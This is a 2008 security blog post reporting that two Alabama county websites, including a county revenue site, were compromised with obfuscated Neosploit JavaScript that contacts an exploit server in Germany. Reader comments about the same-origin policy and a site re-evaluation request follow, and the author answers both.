Thursday, March 13, 2008

Unfortunate hack at tax time

Hi folks,

We noticed a couple of Alabama county websites have been hacked, with a Neosploit call out to a website in Germany.

The two websites are...

hxxp://www.co.blount.al.us/ and
hxxp://www.blountrevenue.com/

(The actual exploit server in Germany seems to be 404 at the moment, but you should still be careful)

The second one is more interesting, particularly given the time of year. The front page looks like this ...



Looks pretty innocent, doesn't it? If you're good at html, and you make a point of looking at page source, you might notice something weird at the top of the page ...



but you probably won't, because no one looks at source much anyway. ;-)

If you have a Really Useful Tool (tm) like our Browser Helper Object, you'll probably notice that it's reaching out to a funny looking site ...



That's because the funny looking javascript s actually a Neosploit obfuscation that decrypts to a call to an attack script at 78.47.147.188. This site is currently 404, but it might come back to life at any time, so be careful.

We've told the very nice folks at the revenue website, so it should be cleaned up soon. It's just a particularly unfortunate website to be hacked at tax time.

Cheers

Roger

Labels:

4 Comments:

At 3:30 AM, Anonymous Anonymous said...

Coming from a systems programming background, I don't have too much experience with all the new web technology. But I have heard of the 'same origin' policy and every time I hear of these kinds of attacks, I just don't understand how they work (if there is a same origin policy in place). Is it just browsers implementing it badly or users ignoring browser warnings or am I just asking the wrong question here out of my web 2.0 ignorance?

Btw, it's fascinating reading your blog. Keep up the great work!

 
At 12:25 AM, Anonymous Anonymous said...

Hi, where can I submit a request to re-test a website that was wrongfully marked as a "cracks site"? The site I'm talking about is for our product, Backup4all, and I have the impression that linkscanner blocks it because we have a page optimized for people that are searching for cracks, which is http://www.backup4all.com/backup4all-crack.php

Thank you.

 
At 6:10 PM, Blogger tcsl said...

Anonymous asked how this stuff could work... the answer is that it's not _supposed_ to work. But it does ... they've found a vulnerability that shouldn't exist if everything was done right, but all software has bugs. They find a bug and create an exploit.

 
At 6:11 PM, Blogger tcsl said...

claudiu spulber asked how to get a website re-evaluated...

Hi Claudiu... the problem would indeed have been the cracks page, but we've adjusted things, and it should be cleared in the next update... today or tomorrow.

Cheers

Roger

 

Post a Comment

<< Home